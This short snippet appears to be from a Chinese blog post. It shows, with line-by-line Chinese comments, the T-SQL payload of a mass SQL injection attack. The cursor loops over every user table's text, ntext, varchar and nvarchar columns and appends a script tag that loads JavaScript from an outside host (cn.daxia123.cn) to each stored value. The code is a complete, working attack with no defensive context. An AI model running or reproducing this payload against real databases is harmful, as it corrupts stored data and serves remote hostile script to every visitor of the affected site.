DECLARE @T VARCHAR(255),@C VARCHAR(255) --声明两个变量
DECLARE Table_Cursor CURSOR FOR --声明游标
Select a.name,b.name
FROM sysobjects a,syscolumns b --系统对象表与字段表
Where a.id=b.id AND a.xtype='u' AND (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) --99 text型 35 ntext --231 nvarchar --167 varchar
OPEN Table_Cursor FETCH NEXT --打开游标
FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('Update ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+'' <script src=http://cn.daxia123.cn/cn.js> </script>''') --这里是更新语句
FETCH NEXT FROM Table_Cursor INTO @T,@C END --获取一下记录
CLOSE Table_Cursor --关闭游标
DEALLOCATE Table_Cursor --释放游标
SQL注入内容更新.
最新推荐文章于 2024-09-18 10:35:21 发布